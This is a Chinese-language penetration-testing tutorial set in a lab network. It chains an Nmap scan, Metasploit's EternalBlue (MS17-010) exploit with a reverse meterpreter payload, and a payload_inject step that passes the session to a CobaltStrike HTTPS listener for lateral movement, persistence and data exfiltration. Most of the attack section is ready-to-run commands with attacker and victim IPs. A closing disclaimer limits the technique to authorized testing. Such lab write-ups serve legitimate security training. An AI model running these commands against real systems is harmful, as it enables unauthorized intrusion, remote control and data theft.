MSF和CobaltStrike联动
字数 1229 2025-08-15 21:32:08

MSF与CobaltStrike联动渗透测试指南

0x00 环境准备

测试环境配置

  • 攻击机: Kali Linux (192.168.60.129)
  • 受害机: Windows系统 (192.168.60.131)
  • 网关: 192.168.60.2

所需工具

  • Nmap - 网络扫描和信息收集
  • Metasploit Framework (MSF) - 漏洞利用框架
  • CobaltStrike - 高级威胁模拟平台

0x01 信息收集阶段

使用Nmap进行扫描

nmap -A 192.168.60.131

扫描结果分析:

  • 开放端口: 445(SMB)、3389(RDP)
  • 操作系统版本信息

漏洞检测

发现目标存在MS17-010(EternalBlue)漏洞

0x02 Metasploit漏洞利用

启动MSF控制台

msfconsole

搜索并选择漏洞模块

search ms17_010
use exploit/windows/smb/ms17_010_eternalblue

配置攻击参数

set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.60.131
set LHOST 192.168.60.129

执行攻击

exploit

成功获取meterpreter会话(session id为1)

0x03 CobaltStrike联动配置

启动CobaltStrike

  1. 启动CobaltStrike团队服务器
  2. 连接客户端

创建监听器

  1. 在CobaltStrike中新建监听器
  2. 配置参数:
    • 监听器类型: HTTPS
    • 主机: 192.168.60.129
    • 端口: 12388

0x04 会话派生(Spawning)

在MSF中配置会话派生

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_https
set DisablePayloadHandler true
set lhost 192.168.60.129
set lport 12388
set session 1
exploit

关键注意事项

  • 只有Meterpreter类型的session才能派生给CobaltStrike
  • DisablePayloadHandler设置为true以避免创建新的处理程序

0x05 CobaltStrike后续利用

成功派生会话后,可在CobaltStrike中:

  1. 使用内置的渗透测试模块
  2. 进行横向移动
  3. 权限维持
  4. 数据渗出等高级操作

0x06 技术要点总结

  1. 信息收集至关重要:

    • 详细的信息收集决定渗透路线
    • 信息关联使用能放大渗透成果
  2. 工具联动优势:

    • 结合MSF的漏洞利用能力和CobaltStrike的后期渗透能力
    • 实现从初始入侵到长期控制的完整链条
  3. 会话派生限制:

    • 仅Meterpreter会话支持派生
    • 需确保payload类型兼容
  4. 安全注意事项:

    • 本技术仅用于合法授权测试
    • 未经授权使用可能涉及法律风险

附录: 常用命令速查

工具 命令/操作 说明
Nmap nmap -A <target> 全面扫描目标
MSF search <keyword> 搜索模块
MSF use <module> 选择模块
MSF set <option> <value> 设置参数
MSF exploit 执行攻击
CobaltStrike 创建HTTPS监听器 准备接收会话
MSF payload_inject 派生会话到CS
MSF与CobaltStrike联动渗透测试指南 0x00 环境准备 测试环境配置 攻击机 : Kali Linux (192.168.60.129) 受害机 : Windows系统 (192.168.60.131) 网关 : 192.168.60.2 所需工具 Nmap - 网络扫描和信息收集 Metasploit Framework (MSF) - 漏洞利用框架 CobaltStrike - 高级威胁模拟平台 0x01 信息收集阶段 使用Nmap进行扫描 扫描结果分析: 开放端口: 445(SMB)、3389(RDP) 操作系统版本信息 漏洞检测 发现目标存在MS17-010(EternalBlue)漏洞 0x02 Metasploit漏洞利用 启动MSF控制台 搜索并选择漏洞模块 配置攻击参数 执行攻击 成功获取meterpreter会话(session id为1) 0x03 CobaltStrike联动配置 启动CobaltStrike 启动CobaltStrike团队服务器 连接客户端 创建监听器 在CobaltStrike中新建监听器 配置参数: 监听器类型: HTTPS 主机: 192.168.60.129 端口: 12388 0x04 会话派生(Spawning) 在MSF中配置会话派生 关键注意事项 只有Meterpreter类型的session才能派生给CobaltStrike DisablePayloadHandler设置为true以避免创建新的处理程序 0x05 CobaltStrike后续利用 成功派生会话后,可在CobaltStrike中: 使用内置的渗透测试模块 进行横向移动 权限维持 数据渗出等高级操作 0x06 技术要点总结 信息收集至关重要 : 详细的信息收集决定渗透路线 信息关联使用能放大渗透成果 工具联动优势 : 结合MSF的漏洞利用能力和CobaltStrike的后期渗透能力 实现从初始入侵到长期控制的完整链条 会话派生限制 : 仅Meterpreter会话支持派生 需确保payload类型兼容 安全注意事项 : 本技术仅用于合法授权测试 未经授权使用可能涉及法律风险 附录: 常用命令速查 | 工具 | 命令/操作 | 说明 | |------|----------|------| | Nmap | nmap -A <target> | 全面扫描目标 | | MSF | search <keyword> | 搜索模块 | | MSF | use <module> | 选择模块 | | MSF | set <option> <value> | 设置参数 | | MSF | exploit | 执行攻击 | | CobaltStrike | 创建HTTPS监听器 | 准备接收会话 | | MSF | payload_inject | 派生会话到CS |